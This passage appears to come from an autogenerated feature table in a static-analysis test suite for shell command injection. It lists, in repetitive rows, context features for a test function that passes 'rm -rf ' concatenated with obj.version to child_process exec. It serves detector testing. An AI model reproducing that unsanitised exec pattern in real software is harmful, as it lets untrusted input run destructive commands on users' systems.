anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:267:36:273:1 | return of anonymous function | enclosingFunctionBody | obj cp exec rm -rf obj version obj version cp exec rm -rf obj version | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:267:36:273:1 | return of anonymous function | enclosingFunctionName | sanitizerProperty | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:267:36:273:1 | return of anonymous function | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:267:46:267:48 | obj | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:267:46:267:48 | obj | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:267:46:267:48 | obj | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:267:46:267:48 | obj | contextSurroundingFunctionParameters | (obj) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:267:46:267:48 | obj | enclosingFunctionBody | obj cp exec rm -rf obj version obj version cp exec rm -rf obj version | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:267:46:267:48 | obj | enclosingFunctionBody | obj cp exec rm -rf obj version obj version cp exec rm -rf obj version | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:267:46:267:48 | obj | enclosingFunctionName | sanitizerProperty | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:267:46:267:48 | obj | enclosingFunctionName | sanitizerProperty | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:267:46:267:48 | obj | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:267:46:267:48 | obj | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:268:2:268:3 | cp | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:268:2:268:3 | cp | contextSurroundingFunctionParameters | (obj) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:268:2:268:3 | cp | enclosingFunctionBody | obj cp exec rm -rf obj version obj version cp exec rm -rf obj version | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:268:2:268:3 | cp | enclosingFunctionName | sanitizerProperty | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:268:2:268:3 | cp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:268:2:268:8 | cp.exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:268:2:268:8 | cp.exec | contextSurroundingFunctionParameters | (obj) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:268:2:268:8 | cp.exec | enclosingFunctionBody | obj cp exec rm -rf obj version obj version cp exec rm -rf obj version | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:268:2:268:8 | cp.exec | enclosingFunctionName | sanitizerProperty | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:268:2:268:8 | cp.exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:268:2:268:33 | cp.exec ... ersion) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:268:2:268:33 | cp.exec ... ersion) | contextSurroundingFunctionParameters | (obj) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:268:2:268:33 | cp.exec ... ersion) | enclosingFunctionBody | obj cp exec rm -rf obj version obj version cp exec rm -rf obj version | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:268:2:268:33 | cp.exec ... ersion) | enclosingFunctionName | sanitizerProperty | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:268:2:268:33 | cp.exec ... ersion) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:268:2:268:33 | exceptional return of cp.exec ... ersion) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:268:2:268:33 | exceptional return of cp.exec ... ersion) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:268:2:268:33 | exceptional return of cp.exec ... ersion) | enclosingFunctionBody | obj cp exec rm -rf obj version obj version cp exec rm -rf obj version | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:268:2:268:33 | exceptional return of cp.exec ... ersion) | enclosingFunctionName | sanitizerProperty | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:268:2:268:33 | exceptional return of cp.exec ... ersion) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:268:5:268:8 | exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:268:5:268:8 | exec | contextSurroundingFunctionParameters | (obj) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:268:5:268:8 | exec | enclosingFunctionBody | obj cp exec rm -rf obj version obj version cp exec rm -rf obj version | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:268:5:268:8 | exec | enclosingFunctionName | sanitizerProperty | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:268:5:268:8 | exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:268:10:268:18 | "rm -rf " | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:268:10:268:18 | "rm -rf " | contextSurroundingFunctionParameters | (obj) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:268:10:268:18 | "rm -rf " | enclosingFunctionBody | obj cp exec rm -rf obj version obj version cp exec rm -rf obj version | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:268:10:268:18 | "rm -rf " | enclosingFunctionName | sanitizerProperty | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:268:10:268:18 | "rm -rf " | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:268:10:268:18 | "rm -rf " | stringConcatenatedWith | -endpoint- obj.version | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:268:10:268:32 | "rm -rf ... version | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:268:10:268:32 | "rm -rf ... version | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:268:10:268:32 | "rm -rf ... version | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:268:10:268:32 | "rm -rf ... version | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:268:10:268:32 | "rm -rf ... version | contextSurroundingFunctionParameters | (obj) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:268:10:268:32 | "rm -rf ... version | enclosingFunctionBody | obj cp exec rm -rf obj version obj version cp exec rm -rf obj version | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:268:10:268:32 | "rm -rf ... version | enclosingFunctionName | sanitizerProperty | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:268:10:268:32 | "rm -rf ... version | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:268:10:268:32 | "rm -rf ... version | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:268:22:268:24 | obj | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:268:22:268:24 | obj | contextSurroundingFunctionParameters | (obj) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:268:22:268:24 | obj | enclosingFunctionBody | obj cp exec rm -rf obj version obj version cp exec rm -rf obj version | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:268:22:268:24 | obj | enclosingFunctionName | sanitizerProperty | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:268:22:268:24 | obj | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:268:22:268:32 | obj.version | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:268:22:268:32 | obj.version | contextSurroundingFunctionParameters | (obj) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:268:22:268:32 | obj.version | enclosingFunctionBody | obj cp exec rm -rf obj version obj version cp exec rm -rf obj version | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:268:22:268:32 | obj.version | enclosingFunctionName | sanitizerProperty | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:268:22:268:32 | obj.version | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:268:22:268:32 | obj.version | stringConcatenatedWith | 'rm -rf ' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:268:26:268:32 | version | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:268:26:268:32 | version | contextSurroundingFunctionParameters | (obj) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:268:26:268:32 | version | enclosingFunctionBody | obj cp exec rm -rf obj version obj version cp exec rm -rf obj version | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:268:26:268:32 | version | enclosingFunctionName | sanitizerProperty | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:268:26:268:32 | version | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:270:2:270:4 | obj | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:270:2:270:4 | obj | contextSurroundingFunctionParameters | (obj) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:270:2:270:4 | obj | enclosingFunctionBody | obj cp exec rm -rf obj version obj version cp exec rm -rf obj version | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:270:2:270:4 | obj | enclosingFunctionName | sanitizerProperty | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:270:2:270:4 | obj | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:270:2:270:12 | obj.version | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:270:2:270:12 | obj.version | contextSurroundingFunctionParameters | (obj) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:270:2:270:12 | obj.version | enclosingFunctionBody | obj cp exec rm -rf obj version obj version cp exec rm -rf obj version | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:270:2:270:12 | obj.version | enclosingFunctionName | sanitizerProperty | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:270:2:270:12 | obj.version | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:270:2:270:17 | obj.version = "" | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, 